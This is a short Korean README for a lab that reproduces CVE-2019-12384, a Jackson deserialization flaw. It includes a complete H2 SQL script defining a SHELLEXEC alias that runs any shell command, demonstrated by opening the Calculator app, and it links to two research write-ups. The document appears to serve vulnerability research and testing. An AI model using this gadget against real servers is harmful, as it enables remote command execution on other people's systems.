
CVE-2019-12384 취약점 테스트 환경
프로젝트를 idea로 가져온 후 maven을 설정하고 자동으로 라이브러리 종속성을 가져오도록 설정하세요. 그런 다음 로컬 웹 빈 디렉토리에 다음 파일을 작성하여 exec.sql로 저장하고 HTTP 서버를 시작하세요:
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
String[] command = {"/bin/bash", "-c", cmd};
java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\0A");
return s.hasNext() ? s.next() : ""; }
$$;
CALL SHELLEXEC('open /Applications/Calculator.app')
코드에서 해당 부분을 수정하여 다른 운영 체제 환경에 맞게 조정하십시오.
계산기가 팝업되는 것을 볼 수 있습니다.
https://blog.doyensec.com/2019/07/22/jackson-gadgets.html
https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html